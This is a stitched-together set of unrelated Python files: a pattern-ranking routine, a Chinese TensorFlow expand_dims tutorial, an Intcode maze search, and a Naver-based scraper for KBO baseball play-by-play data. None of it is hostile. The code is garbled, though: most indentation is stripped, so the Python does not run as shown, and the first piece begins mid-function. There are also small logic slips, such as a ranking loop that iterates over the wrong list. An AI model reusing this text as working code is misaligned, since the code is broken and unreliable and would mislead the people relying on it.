if type(possPatts[0]) is list:
#1. First narrow by score, but only if they got scored
narrowedByScorePatts = narrowPatternsByScore(possPatts)
isBest = pickIfOnePattern(narrowedByScorePatts)
if isBest not in ['None', 'Nope']:
##print("..Found best pattern by narrowing score ", isBest)
return isBest
        # This shouldn't happen:
        # elif isBest in ['None']:
        #     print("---Score killed all options!")
else:
narrowedByScorePatts = possPatts
# Let's look at the mult-add as it relates to the element and mode of this degree
maxRow = aspects.getValidMaxRow(rowNum + numRowsRepeat)
print(sign_degree_dict[rowNum], "-", sign_degree_dict[maxRow])
narrowedByModeElements = modesElements.narrowPatternsByModesElements(narrowedByScorePatts, sign_degree_dict[rowNum], sign_degree_dict[maxRow])
isBest = pickIfOnePattern(narrowedByModeElements)
if isBest not in ['None', 'Nope']:
##print("..Found best pattern by narrowing by modes/elements ", isBest)
return isBest
elif isBest not in ['None']:
narrowedByNumAspects = aspects.narrowByNumAspectStuff(narrowedByModeElements, rowAspects)
isBest = pickIfOnePattern(narrowedByNumAspects)
if isBest not in ['None', 'Nope']:
##print("...Found best pattern by narrowing by numAspects ", isBest)
return isBest
elif isBest not in ['None']:
#print("Couldn't narrow by num aspects (1)", narrowedByNumAspects)
#print("Forcing match:", narrowedByNumAspects)
bestPatt = forceRankPatternMatch(narrowedByNumAspects, sign_degree_dict[rowNum])
else:
#print("Forcing match (1):", narrowedByModeElements)
bestPatt = forceRankPatternMatch(narrowedByModeElements, sign_degree_dict[rowNum])
else:
#print("No match when narrow by mode/element", narrowedByModeElements)
narrowedByNumAspects = aspects.narrowByNumAspectStuff(narrowedByScorePatts, rowAspects)
isBest = pickIfOnePattern(narrowedByNumAspects)
if isBest not in ['None', 'Nope']:
##print("...Found best pattern by narrowing narrowedByScorePatts by numAspects ", isBest)
return isBest
elif isBest not in ['None']:
#print("Couldn't narrow by num aspects", narrowedByNumAspects)
#print("Forcing match:", narrowedByNumAspects)
bestPatt = forceRankPatternMatch(narrowedByNumAspects, sign_degree_dict[rowNum])
else:
#print("Forcing match:", narrowedByScorePatts)
bestPatt = forceRankPatternMatch(narrowedByScorePatts, sign_degree_dict[rowNum])
return bestPatt
def subtractFromLarger(v1, v2):
    # absolute difference between the two values
    return abs(v1 - v2)
def forceRankPatternMatch(possPatts, signAtRowNum):
# Choose the pattern with the (mult+add) closest to the signAtRowNum score
meetScore = constants.SIGN_SCORE[signAtRowNum]
##print("meetScore:", meetScore)
bestPatts = []
closeCnt = 0
for patt in possPatts:
mult = constants.PATTERN_MULT_ADD[patt][0]
add = constants.PATTERN_MULT_ADD[patt][1]
totCnt = mult + add
compareCnt = subtractFromLarger(meetScore, totCnt)
##print("patt", patt, "totCnt:", totCnt, " closeCnt:", closeCnt, " bestPatts:", bestPatts, "compareCnt", compareCnt)
if compareCnt < closeCnt or len(bestPatts) == 0:
bestPatts.append(patt)
closeCnt = compareCnt
if len(bestPatts) > 1:
#Choose the pattern with the highest stitch count mult and add, added tog
maxCnt = 0
bestPatt = ''
for patt in possPatts:
mult = constants.PATTERN_MULT_ADD[patt][0]
add = constants.PATTERN_MULT_ADD[patt][1]
totCnt = mult + add
if totCnt > maxCnt:
bestPatt = patt
maxCnt = totCnt
else:
bestPatt = bestPatts[0]
##print("..Forcing match chose:", bestPatt)
return bestPatt
def determineHighScore(possPatts):
bestScore = 0
for score, patt in possPatts:
escore = eval(score)
if escore > bestScore:
bestScore = escore
#print("Best score:", bestScore)
return bestScore
def narrowPatternsByScore(possPatts):
narrowedPatts = []
highScore = determineHighScore(possPatts)
for score, patt in possPatts:
#print("score:", eval(score), " for patt", patt)
if eval(score) >= highScore:
narrowedPatts.append(patt)
return narrowedPatts
def pickIfOnePattern(bestPatts):
if len(bestPatts) == 1:
#print("...picking best patt:", bestPatts[0], type(bestPatts), type(bestPatts[0]))
if type(bestPatts[0]) is list:
return bestPatts[0][1]
else:
return bestPatts[0]
elif len(bestPatts) == 0:
return 'None'
else:
return 'Nope'
def getJustPatternNames(scoredPatts):
justPatts = []
for patt in scoredPatts:
justPatts.append(patt[1])
return justPatts
def getPatternsForRowCount(grouped_byAspect):
possible_patterns = []
for aspList, cnt in grouped_byAspect:
possible_patterns.append([aspList, cnt, getPatternsForCnt(cnt)])
return possible_patterns
def getPatternsForRowCountExpand(grouped_byAspect):
possible_patterns = []
for aspList, cnt in grouped_byAspect:
possible_patterns.append([aspList, cnt, getPatternsForCntExpand(cnt)])
return possible_patterns
def getPatternsForMaxRowCount(grouped_byAspect):
possible_patterns = []
for aspList, cnt in grouped_byAspect:
possible_patterns.append([aspList, cnt, getPatternsForCntMaxExpand(cnt)])
return possible_patterns
def getPatternsForCnt(cnt):
poss_pats = []
for pat in constants.PATTERN_ROWS:
# print(pat, constants.PATTERN_ROWS[pat])
if constants.PATTERN_ROWS[pat] == cnt:
poss_pats.append(pat)
return poss_pats
def getPatternsMatchingRows(possPatts, numRows):
matches = []
for pat in possPatts:
if constants.PATTERN_ROWS[pat] == numRows:
matches.append(pat)
return matches
def getPatternsForCntExpand(cnt):
poss_pats = []
for pat in constants.PATTERN_ROWS:
# print(pat, constants.PATTERN_ROWS[pat])
if constants.PATTERN_ROWS[pat] == cnt:
# Add all patterns that repeat over this exact #of rows
poss_pats.append(pat)
elif cnt > 1 and constants.PATTERN_ROWS[pat] % cnt == 0:
# Add all patterns that repeat over multiple of this #of rows, can be repeated
poss_pats.append(pat)
elif constants.PATTERN_ROWS[pat] == 1:
# Add all patterns that are only over a single row, since they can be repeated
poss_pats.append(pat)
return poss_pats
def getPatternsForCntMaxExpand(cnt):
poss_pats = []
for pat in constants.PATTERN_ROWS:
# print(pat, constants.PATTERN_ROWS[pat])
if constants.PATTERN_ROWS[pat] == cnt:
# Add all patterns that repeat over this exact #of rows
poss_pats.append(pat)
elif cnt > 1 and constants.PATTERN_ROWS[pat] % cnt == 0:
# Add all patterns that repeat over multiple of this #of rows, can be repeated
poss_pats.append(pat)
elif constants.PATTERN_ROWS[pat] == 1:
# Add all patterns that are only over a single row, since they can be repeated
poss_pats.append(pat)
elif constants.PATTERN_ROWS[pat] < cnt:
# Add all patterns that are less than this total #of rows, would be partial but possibly better shape match
poss_pats.append(pat)
return poss_pats
|
"""tf.expand_dims(input, dim, name = None)
解释:这个函数的作用是向input中插入维度是1的张量。
我们可以指定插入的位置dim,dim的索引从0开始,dim的值也可以是负数,从尾部开始插入,符合 python 的语法。
这个操作是非常有用的。举个例子,如果你有一张图片,数据维度是[height, width, channels],你想要加入“批量”这个信息,
那么你可以这样操作expand_dims(images, 0),那么该图片的维度就变成了[1, height, width, channels]。
这个操作要求:
-1-input.dims() <= dim <= input.dims()
这个操作是squeeze()函数的相反操作,可以一起灵活运用。"""
import tensorflow as tf
sess = tf.Session()
data = tf.constant([[1, 2, 1], [3, 1, 1]])
print(sess.run(tf.shape(data)))
# [2 3]
d_1 = tf.expand_dims(data, 0)
print(sess.run(tf.shape(d_1)))
# [1 2 3]
print("1:add dimension to 0 ", d_1)
# 1:add dimension to 0 Tensor("ExpandDims:0", shape=(1, 2, 3), dtype=int32)
d_1 = tf.expand_dims(d_1, 2)
print(sess.run(tf.shape(d_1)))
# [1 2 1 3]
print("2:add dimension to 2 ", d_1)
# 2:add dimension to 2 Tensor("ExpandDims_1:0", shape=(1, 2, 1, 3), dtype=int32)
d_1 = tf.expand_dims(d_1, -1)
print(sess.run(tf.shape(d_1)))
# [1 2 1 3 1]
print("3:add dimension to -1 ", d_1)
# 3:add dimension to -1 Tensor("ExpandDims_2:0", shape=(1, 2, 1, 3, 1), dtype=int32)
"""输入参数:
● input: 一个Tensor。
● dim: 一个Tensor,数据类型是int32,标量。
● name:(可选)为这个操作取一个名字。
输出参数:
● 一个Tensor,数据类型和输入数据相同,数据和input相同,但是维度增加了一维。"""
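# Inverse-operation sketch (assumes the same TF1-style session as above):
d_2 = tf.squeeze(d_1, axis=[0, 2, 4])  # drop the size-1 dims inserted above
print(sess.run(tf.shape(d_2)))
# [2 3]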
|
import sys
from computer import Computer
from copy import deepcopy
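# Approach: breadth-first search over the ship map. `move` expands each
# reachable tile by cloning the Intcode computer state and prints the step
# count when the oxygen system (output 2) is reached; `fill` then flood-fills
# outward from the oxygen system and returns the number of steps needed to
# reach the farthest open tile.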
def move(comp, position, step_count):
step_count += 1
for i in range(4):
pos = deepcopy(position)
if i == 0:
pos[1] += 1
elif i == 1:
pos[1] -= 1
elif i == 2:
pos[0] -= 1
else:
pos[0] += 1
if tuple(pos) in layout:
continue
new_comp = deepcopy(comp)
new_comp.input(i+1)
new_comp.run()
out = new_comp.output()[0]
layout[tuple(pos)] = out
if out == 0:
continue
else:
queue.append((new_comp, pos, step_count))
if out == 2:
print(step_count)
return pos
return None
def fill(position, step_count):
step_count += 1
n = (position[0], position[1] + 1)
s = (position[0], position[1] - 1)
w = (position[0] + 1, position[1])
e = (position[0] - 1, position[1])
nn = 0
sn = 0
wn = 0
en = 0
if n in layout and layout[n] != 0 and n not in flood:
flood[n] = step_count
nn = 1 + fill(n, step_count)
if s in layout and layout[s] != 0 and s not in flood:
flood[s] = step_count
sn = 1 + fill(s, step_count)
if w in layout and layout[w] != 0 and w not in flood:
flood[w] = step_count
wn = 1 + fill(w, step_count)
if e in layout and layout[e] != 0 and e not in flood:
flood[e] = step_count
en = 1 + fill(e, step_count)
return max(nn, sn, wn, en)
c = Computer(sys.argv[1])
layout = {(0, 0): 1}
queue = [(c, [0, 0], 0)]
oxygen_pos = []
while len(queue):
item = queue.pop(0)
r = move(item[0], item[1], item[2])
    if r is not None:
oxygen_pos = r
flood = {tuple(oxygen_pos): 0}
print(fill(tuple(oxygen_pos), 0))
|
import pandas as pd
import sys, time, requests, json, datetime, pathlib, warnings
from json import JSONDecodeError
import numpy as np
from dateutil.relativedelta import relativedelta
from tqdm import tqdm, trange
from bs4 import BeautifulSoup
from game_parse import game_status
regular_start = {
'3333': '0101', # playoff
'4444': '0101', # playoff
'5555': '0101', # playoff
'7777': '0101', # playoff
'2008': '0329',
'2009': '0404',
'2010': '0327',
'2011': '0402',
'2012': '0407',
'2013': '0330',
'2014': '0329',
'2015': '0328',
'2016': '0401',
'2017': '0331',
'2018': '0324',
'2019': '0323',
'2020': '0505',
'2021': '0403',
}
playoff_start = {
'3333': '1231', # playoff
'4444': '1231', # playoff
'5555': '1231', # playoff
'7777': '1231', # playoff
'2008': '1008',
'2009': '0920',
'2010': '1005',
'2011': '1008',
'2012': '1008',
'2013': '1008',
'2014': '1019',
'2015': '1010',
'2016': '1021',
'2017': '1010',
'2018': '1015',
'2019': '1003',
'2020': '1101',
'2021': '1101',
}
def get_game_ids(start_date, end_date, playoff=False):
"""
KBO 경기 ID를 가져온다.
Parameters
-----------
start_date, end_date : datetime.date
ID를 가져올 경기 기간의 시작일과 종료일.
start_date <= Game Date of Games <= end_date
playoff : bool, default False
True일 경우 플레이오프(포스트시즌) 경기 ID도 받는다.
"""
timetable_url = 'https://sports.news.naver.com/'\
'kbaseball/schedule/index.nhn?month='
mon1 = start_date.replace(day=1)
r = []
while mon1 <= end_date:
r.append(mon1)
mon1 += relativedelta(months=1)
game_ids = []
for d in r:
month = d.month
year = d.year
year_regular_start = regular_start[str(year)]
year_playoff_start = playoff_start[str(year)]
year_regular_start_date = datetime.date(year,
int(year_regular_start[:2]),
int(year_regular_start[2:]))
year_playoff_start_date = datetime.date(year,
int(year_playoff_start[:2]),
int(year_playoff_start[2:]))
year_last_date = datetime.date(year, 12, 31)
sch_url = timetable_url + f'{month}&year={year}'
response = requests.get(sch_url)
soup = BeautifulSoup(response.text, 'lxml')
response.close()
sch_tbs = soup.findAll('div', attrs={'class': 'sch_tb'})
sch_tb2s = soup.findAll('div', attrs={'class': 'sch_tb2'})
sch_tbs += sch_tb2s
for row in sch_tbs:
day_table = row.findAll('tr')
for game in day_table:
add_state = game.findAll('td', attrs={'class': 'add_state'})
tds = game.findAll('td')
if len(tds) < 4:
continue
links = game.findAll('span',
attrs={'class': 'td_btn'})
date_td = game.findAll('span', attrs={'class': 'td_date'})
if len(date_td) > 0:
date_text = date_td[0].text
if len(add_state) > 0:
status = add_state[0].findAll('span')[-1].get('class')[0]
if status == 'suspended':
continue
for btn in links:
gid = btn.a['href'].split('/')[2]
try:
gid_date = datetime.date(int(gid[:4]),
int(gid[4:6]),
int(gid[6:8]))
except:
continue
if start_date <= gid_date <= end_date:
if playoff == False:
if year_regular_start_date <= gid_date < year_playoff_start_date:
game_ids.append(gid)
else:
if year_regular_start_date <= gid_date < year_last_date:
game_ids.append(gid)
return game_ids
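# Usage sketch (illustrative dates):
#   ids = get_game_ids(datetime.date(2019, 3, 23), datetime.date(2019, 3, 31))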
def get_game_data(game_id):
"""
KBO 경기 PBP 데이터를 가져온다.
Parameters
-----------
game_id : str
가져올 게임 ID.
"""
relay_url = 'http://m.sports.naver.com/ajax/baseball/'\
'gamecenter/kbo/relayText.nhn'
record_url = 'http://m.sports.naver.com/ajax/baseball/'\
'gamecenter/kbo/record.nhn'
params = {'gameId': game_id, 'half': '1'}
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'
'AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/59.0.3071.115 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
'Host': 'm.sports.naver.com',
'Referer': 'http://m.sports.naver.com/baseball'\
'/gamecenter/kbo/index.nhn?&gameId='
+ game_id
+ '&tab=relay'
}
with warnings.catch_warnings():
warnings.simplefilter('ignore')
    #####################################
    # 1. Fetch pitch-by-pitch data      #
    #####################################
relay_response = requests.get(relay_url,
params=params,
headers=headers)
if relay_response.status_code > 200:
relay_response.close()
return [None, None, 'response error\n']
relay_json = relay_response.json()
js = None
try:
js = json.loads(relay_json)
relay_response.close()
except JSONDecodeError:
relay_response.close()
return [None, None, 'got no valid data\n']
if js.get('gameId') is None:
return [None, None, 'invalid game ID\n']
last_inning = js['currentInning']
if last_inning is None:
return [None, None, 'no last inning\n']
game_data_set = {}
game_data_set['relayList'] = []
for x in js['relayList']:
game_data_set['relayList'].append(x)
    # contains basic lineup information
game_data_set['homeTeamLineUp'] = js['homeTeamLineUp']
game_data_set['awayTeamLineUp'] = js['awayTeamLineUp']
game_data_set['stadium'] = js['schedule']['stadium']
for inn in range(2, last_inning + 1):
params = {
'gameId': game_id,
'half': str(inn)
}
relay_inn_response = requests.get(relay_url, params=params, headers=headers)
if relay_inn_response.status_code > 200:
relay_inn_response.close()
return [None, None, 'response error\n']
relay_json = relay_inn_response.json()
try:
js = json.loads(relay_json)
relay_response.close()
except JSONDecodeError:
relay_inn_response.close()
return [None, None, 'got no valid data\n']
for x in js['relayList']:
game_data_set['relayList'].append(x)
    ###############################
    # 2. Tidy up the fetched data #
    ###############################
relay_list = game_data_set['relayList']
text_keys = ['seqno', 'text', 'type', 'stuff',
'ptsPitchId', 'speed', 'playerChange']
pitch_keys = ['crossPlateX', 'topSz',
'pitchId', 'vy0', 'vz0', 'vx0',
'z0', 'ax', 'x0', 'ay', 'az',
'bottomSz']
    # collect the pitch-by-pitch text data
text_set = []
stadium = game_data_set['stadium']
for k in range(len(relay_list)):
for j in range(len(relay_list[k].get('textOptionList'))):
text_row = relay_list[k].get('textOptionList')[j]
text_row_dict = {}
text_row_dict['textOrder'] = relay_list[k].get('no')
for key in text_keys:
if key == 'playerChange':
if text_row.get(key) is not None:
for x in ['outPlayer', 'inPlayer', 'shiftPlayer']:
if x in text_row.get(key).keys():
text_row_dict[x] = text_row.get(key).get(x).get('playerId')
else:
text_row_dict[key] = None if key not in text_row.keys() else text_row.get(key)
# text_row_dict['referee'] = referee
text_row_dict['stadium'] = stadium
text_set.append(text_row_dict)
text_set_df = pd.DataFrame(text_set)
text_set_df = text_set_df.rename(index=str, columns={'ptsPitchId': 'pitchId'})
text_set_df.seqno = pd.to_numeric(text_set_df.seqno)
        # collect the pitch-by-pitch tracking data
pitch_data_set = []
pitch_data_df = None
for k in range(len(relay_list)):
if relay_list[k].get('ptsOptionList') is not None:
for j in range(len(relay_list[k].get('ptsOptionList'))):
pitch_data = relay_list[k].get('ptsOptionList')[j]
pitch_data_dict = {}
pitch_data_dict['textOrder'] = relay_list[k].get('no')
for key in pitch_keys:
pitch_data_dict[key] = None if key not in pitch_data.keys() else pitch_data.get(key)
pitch_data_set.append(pitch_data_dict)
        # merge the text (relay) data with the tracking data
if len(pitch_data_set) > 0:
pitch_data_df = pd.DataFrame(pitch_data_set)
relay_df = pd.merge(text_set_df, pitch_data_df, how='outer').sort_values(['textOrder', 'seqno'])
else:
relay_df = text_set_df.sort_values(['textOrder', 'seqno'])
        ########################################################
        # 3. Fetch starting lineup, position, and referee data #
        ########################################################
lineup_url = 'https://sports.news.naver.com/gameCenter'\
'/gameRecord.nhn?category=kbo&gameId='
lineup_response = requests.get(lineup_url + game_id)
if lineup_response.status_code > 200:
lineup_response.close()
return [None, None, 'response error\n']
lineup_soup = BeautifulSoup(lineup_response.text, 'lxml')
lineup_response.close()
scripts = lineup_soup.find_all('script')
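        # the error page contains '잘못된' ('invalid')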
if scripts[10].contents[0].find('잘못된') > 0:
return [None, None, 'false script page\n']
team_names = lineup_soup.find_all('span', attrs={'class': 't_name_txt'})
away_team_name = team_names[0].contents[0].split(' ')[0]
home_team_name = team_names[1].contents[0].split(' ')[0]
for tag in scripts:
if len(tag.contents) > 0:
if tag.contents[0].find('DataClass = ') > 0:
contents = tag.contents[0]
start = contents.find('DataClass = ') + 36
end = contents.find('_homeTeam')
oldjs = contents[start:end].strip()
while oldjs[-1] != '}':
oldjs = oldjs[:-1]
while oldjs[0] != '{':
oldjs = oldjs[1:]
try:
cont = json.loads(oldjs)
except JSONDecodeError:
return [None, None, f'JSONDecodeError - gameID {game_id}\n']
break
        # extract the home-plate umpire and attach it
referee = cont.get('etcRecords')[-1]['result'].split(' ')[0]
relay_df = relay_df.assign(referee = referee)
        # post-game box score and home/away lineups
boxscore = cont.get('battersBoxscore')
away_lineup = boxscore.get('away')
home_lineup = boxscore.get('home')
pos_dict = {'중': '중견수', '좌': '좌익수', '우': '우익수',
'유': '유격수', '포': '포수', '지': '지명타자',
'一': '1루수', '二': '2루수', '三': '3루수'}
home_players = []
away_players = []
for i in range(len(home_lineup)):
player = home_lineup[i]
name = player.get('name')
pos = player.get('pos')[0]
pCode = player.get('playerCode')
home_players.append({'name': name, 'pos': pos, 'pCode': pCode})
for i in range(len(away_lineup)):
player = away_lineup[i]
name = player.get('name')
pos = player.get('pos')[0]
pCode = player.get('playerCode')
away_players.append({'name': name, 'pos': pos, 'pCode': pCode})
        ##########################################
        # 4. Merge with the existing lineup data #
        ##########################################
hit_columns = ['name', 'pCode', 'posName',
'hitType', 'seqno', 'batOrder']
pit_columns = ['name', 'pCode', 'hitType', 'seqno']
atl = game_data_set.get('awayTeamLineUp')
abat = atl.get('batter')
apit = atl.get('pitcher')
abats = pd.DataFrame(abat, columns=hit_columns).sort_values(['batOrder', 'seqno'])
apits = pd.DataFrame(apit, columns=pit_columns).sort_values('seqno')
htl = game_data_set.get('homeTeamLineUp')
hbat = htl.get('batter')
hpit = htl.get('pitcher')
hbats = pd.DataFrame(hbat, columns=hit_columns).sort_values(['batOrder', 'seqno'])
hpits = pd.DataFrame(hpit, columns=pit_columns).sort_values('seqno')
        #####################################
        # 5. Enrich the lineup data         #
        #####################################
record_response = requests.get(record_url,
params=params,
headers=headers)
if record_response.status_code > 200:
record_response.close()
return [None, None, 'response error\n']
record_json = record_response.json()
record_response.close()
apr = pd.DataFrame(record_json['awayPitcher'])
hpr = pd.DataFrame(record_json['homePitcher'])
abr = pd.DataFrame(record_json['awayBatter'])
hbr = pd.DataFrame(record_json['homeBatter'])
apr = apr.rename(index=str, columns={'pcode':'pCode'})
hpr = hpr.rename(index=str, columns={'pcode':'pCode'})
abr = abr.rename(index=str, columns={'pcode':'pCode'})
hbr = hbr.rename(index=str, columns={'pcode':'pCode'})
apr.loc[:, 'seqno'] = 10
apr.loc[:, 'hitType'] = None
hpr.loc[:, 'seqno'] = 10
hpr.loc[:, 'hitType'] = None
abr.loc[:, 'seqno'] = 10
abr.loc[:, 'hitType'] = None
abr.loc[:, 'posName'] = None
hbr.loc[:, 'seqno'] = 10
hbr.loc[:, 'hitType'] = None
hbr.loc[:, 'posName'] = None
for p in apr.pCode.unique():
if p in apits.pCode.unique():
apr.loc[(apr.pCode == p), 'seqno'] = int(apits.loc[apits.pCode == p].seqno.values[0])
apr.loc[(apr.pCode == p), 'hitType'] = apits.loc[apits.pCode == p].hitType.values[0]
else:
apr.loc[(apr.pCode == p), 'seqno'] = 10
for p in hpr.pCode.unique():
if p in hpits.pCode.unique():
hpr.loc[(hpr.pCode == p), 'seqno'] = int(hpits.loc[hpits.pCode == p].seqno.values[0])
hpr.loc[(hpr.pCode == p), 'hitType'] = hpits.loc[hpits.pCode == p].hitType.values[0]
else:
hpr.loc[(hpr.pCode == p), 'seqno'] = 10
        for p in abr.pCode.unique():
if p in abats.pCode.unique():
abr.loc[(abr.pCode == p), 'seqno'] = int(abats.loc[abats.pCode == p].seqno.values[0])
abr.loc[(abr.pCode == p), 'posName'] = abats.loc[abats.pCode == p].posName.values[0]
abr.loc[(abr.pCode == p), 'hitType'] = abats.loc[abats.pCode == p].hitType.values[0]
else:
abr.loc[(abr.pCode == p), 'seqno'] = 10
        for p in hbr.pCode.unique():
if p in hbats.pCode.unique():
hbr.loc[(hbr.pCode == p), 'seqno'] = int(hbats.loc[hbats.pCode == p].seqno.values[0])
hbr.loc[(hbr.pCode == p), 'posName'] = hbats.loc[hbats.pCode == p].posName.values[0]
hbr.loc[(hbr.pCode == p), 'hitType'] = hbats.loc[hbats.pCode == p].hitType.values[0]
else:
hbr.loc[(hbr.pCode == p), 'seqno'] = 10
apr = apr.astype({'seqno': int})
hpr = hpr.astype({'seqno': int})
abr = abr.astype({'seqno': int})
hbr = hbr.astype({'seqno': int})
apits = apr[pit_columns]
hpits = hpr[pit_columns]
abats = abr[hit_columns]
hbats = hbr[hit_columns]
        # for starters, reset each player's position to the one held at game start
        # (the pitch-by-pitch data reports positions as of the end of the game)
for player in away_players:
            # skip substitutes, marked as '교' (replacement)
if player.get('pos') == '교':
continue
abats.loc[(abats.name == player.get('name')) &
(abats.pCode == player.get('pCode')), 'posName'] = pos_dict.get(player.get('pos'))
if len(player.get('name')) > 3:
pname = player.get('name')
for i in range(len(abats)):
if abats.iloc[i].values[0].find(pname) > -1:
pCode = abats.iloc[i].pCode
abats.loc[(abats.pCode == pCode), 'posName'] = pos_dict.get(player.get('pos'))
break
for player in home_players:
            # skip substitutes, marked as '교' (replacement)
if player.get('pos') == '교':
continue
hbats.loc[(hbats.name == player.get('name')) &
(hbats.pCode == player.get('pCode')), 'posName'] = pos_dict.get(player.get('pos'))
if len(player.get('name')) > 3:
pname = player.get('name')
for i in range(len(hbats)):
if hbats.iloc[i].values[0].find(pname) > -1:
pCode = hbats.iloc[i].pCode
hbats.loc[(hbats.pCode == pCode), 'posName'] = pos_dict.get(player.get('pos'))
break
abats = abats.assign(homeaway = 'a', team_name = away_team_name)
hbats = hbats.assign(homeaway = 'h', team_name = home_team_name)
apits = apits.assign(homeaway = 'a', team_name = away_team_name)
hpits = hpits.assign(homeaway = 'h', team_name = home_team_name)
batting_df = pd.concat([abats, hbats])
pitching_df = pd.concat([apits, hpits])
batting_df.pCode = pd.to_numeric(batting_df.pCode)
pitching_df.pCode = pd.to_numeric(pitching_df.pCode)
return pitching_df, batting_df, relay_df
def get_game_data_renewed(game_id):
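    """Fetch KBO game PBP data through the renewed Naver sports API."""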
nav_api_header = 'https://api-gw.sports.naver.com/schedule/games/'
with warnings.catch_warnings():
warnings.simplefilter('ignore')
        #####################################
        # 0. Fetch the game metadata        #
        #####################################
game_req = requests.get(nav_api_header + game_id)
if game_req.status_code > 200:
game_req.close()
return [None, None, 'meta data request error\n']
game_req_result = game_req.json()
if game_req_result.get('code') > 200:
game_req.close()
return [None, None, 'meta data request error\n']
game_req.close()
game_meta_data = game_req_result.get('result').get('game')
stadium = game_meta_data.get('stadium')
homeTeamCode = game_meta_data.get('homeTeamCode')
homeTeamName = game_meta_data.get('homeTeamName')
awayTeamCode = game_meta_data.get('awayTeamCode')
awayTeamName = game_meta_data.get('awayTeamName')
if game_meta_data.get('currentInning') is not None:
max_inning = int(game_meta_data.get('currentInning').split('회')[0])
else:
max_inning = int(game_meta_data.get('statusInfo').split('회')[0])
box_score_req = requests.get(f'{nav_api_header}{game_id}/record')
if box_score_req.status_code > 200:
box_score_req.close()
return [None, None, 'meta data(box score) request error\n']
box_score_req_result = box_score_req.json()
if box_score_req_result.get('code') > 200:
box_score_req.close()
return [None, None, 'meta data(box score) request error\n']
box_score_req.close()
box_score_data = box_score_req_result.get('result').get('recordData')
if len(box_score_data.get('etcRecords')) > 0:
referees = box_score_data.get('etcRecords')[-1].get('result').split(' ')
else:
print(game_id)
referees = ['']
away_batting_order = box_score_data.get('battersBoxscore').get('away')
home_batting_order = box_score_data.get('battersBoxscore').get('home')
away_pitchers = box_score_data.get('pitchersBoxscore').get('away')
home_pitchers = box_score_data.get('pitchersBoxscore').get('home')
        #####################################
        # 1. Fetch pitch-by-pitch data      #
        #####################################
game_data_set = {}
game_data_set['pitchTextList'] = []
game_data_set['pitchTrackDataList'] = []
text_keys = ['seqno', 'text', 'type', 'stuff',
'ptsPitchId', 'speed', 'playerChange']
pitch_keys = ['crossPlateX', 'topSz',
'pitchId', 'vy0', 'vz0', 'vx0',
'z0', 'ax', 'x0', 'ay', 'az',
'bottomSz']
for inning in range(1, max_inning+1):
pbp_req = requests.get(f'{nav_api_header}{game_id}/relay?inning={inning}')
            if pbp_req.status_code > 200:
                pbp_req.close()
                return [None, None, 'pbp relay data request error\n']
pbp_req_result = pbp_req.json()
            if pbp_req_result.get('code') > 200:
                pbp_req.close()
                return [None, None, 'pbp relay data request error\n']
pbp_req.close()
pbp_data = pbp_req_result.get('result').get('textRelayData')
for textSetList in pbp_data.get('textRelays')[::-1]:
textRow = {}
pitchTrackerRow = {}
textSet = textSetList.get('textOptions')
textSetNo = textSetList.get('no')
for pitchTextData in textSet:
textRow = {}
textRow['textOrder'] = textSetNo
for key in text_keys:
if key == 'playerChange':
if pitchTextData.get(key) is not None:
for x in ['outPlayer', 'inPlayer', 'shiftPlayer']:
if x in pitchTextData.get(key).keys():
textRow[x] = pitchTextData.get(key).get(x).get('playerId')
else:
if key not in pitchTextData.keys():
textRow[key] = None
else:
textRow[key] = pitchTextData.get(key)
textRow['referee'] = referees[0]
textRow['stadium'] = stadium
game_data_set['pitchTextList'].append(textRow)
pitchTrackerSet = textSetList.get('ptsOptions')
for pitchTrackData in pitchTrackerSet:
pitchTrackerRow = {}
pitchTrackerRow['textOrder'] = textSetNo
for key in pitch_keys:
if key not in pitchTrackData.keys():
pitchTrackerRow[key] = None
else:
pitchTrackerRow[key] = pitchTrackData.get(key)
                    game_data_set['pitchTrackDataList'].append(pitchTrackerRow)
text_set_df = pd.DataFrame(game_data_set['pitchTextList'])
text_set_df = text_set_df.rename(index=str, columns={'ptsPitchId': 'pitchId'})
text_set_df.seqno = pd.to_numeric(text_set_df.seqno)
        # merge the text (relay) data with the tracking data
if len(game_data_set['pitchTrackDataList']) > 0:
pitch_data_df = pd.DataFrame(game_data_set['pitchTrackDataList'])
relay_df = pd.merge(text_set_df, pitch_data_df, how='outer').sort_values(['textOrder', 'seqno'])
else:
relay_df = text_set_df.sort_values(['textOrder', 'seqno'])
        ########################################
        # 2. Organize the lineups              #
        ########################################
        # contains basic lineup information
        # final post-game data -> positions reflect the end of the game
game_data_set['awayLineup'] = pbp_data.get('awayLineup')
game_data_set['homeLineup'] = pbp_data.get('homeLineup')
game_data_set['stadium'] = stadium
pos_dict = {'중': '중견수', '좌': '좌익수', '우': '우익수',
'유': '유격수', '포': '포수', '지': '지명타자',
'一': '1루수', '二': '2루수', '三': '3루수'}
home_players = []
away_players = []
for i in range(len(home_batting_order)):
player = home_batting_order[i]
name = player.get('name')
pos = player.get('pos')[0]
pcode = player.get('playerCode')
home_players.append({'name': name, 'pos': pos, 'pcode': pcode})
for i in range(len(away_batting_order)):
player = away_batting_order[i]
name = player.get('name')
pos = player.get('pos')[0]
pcode = player.get('playerCode')
away_players.append({'name': name, 'pos': pos, 'pcode': pcode})
        #################################################
        # 3. Merge with lineup info from the metadata   #
        #################################################
        # the metadata holds positions as of the start of the game
hit_columns = ['name', 'pcode', 'posName',
'hitType', 'seqno', 'batOrder']
pit_columns = ['name', 'pcode', 'hitType', 'seqno']
away_lineup_meta_data = game_data_set.get('awayLineup')
away_batters = away_lineup_meta_data.get('batter')
away_pitchers = away_lineup_meta_data.get('pitcher')
away_lineup_df = pd.DataFrame(away_batters, columns=hit_columns).sort_values(['batOrder', 'seqno'])
away_pitcher_df = pd.DataFrame(away_pitchers, columns=pit_columns).sort_values('seqno')
home_lineup_meta_data = game_data_set.get('homeLineup')
home_batters = home_lineup_meta_data.get('batter')
home_pitchers = home_lineup_meta_data.get('pitcher')
home_lineup_df = pd.DataFrame(home_batters, columns=hit_columns).sort_values(['batOrder', 'seqno'])
home_pitcher_df = pd.DataFrame(home_pitchers, columns=pit_columns).sort_values('seqno')
away_lineup_df = away_lineup_df.assign(pcode = pd.to_numeric(away_lineup_df.pcode))
away_pitcher_df = away_pitcher_df.assign(pcode = pd.to_numeric(away_pitcher_df.pcode))
home_lineup_df = home_lineup_df.assign(pcode = pd.to_numeric(home_lineup_df.pcode))
home_pitcher_df = home_pitcher_df.assign(pcode = pd.to_numeric(home_pitcher_df.pcode))
ap = pd.DataFrame(away_players)
ap = ap.assign(pcode = pd.to_numeric(ap.pcode))
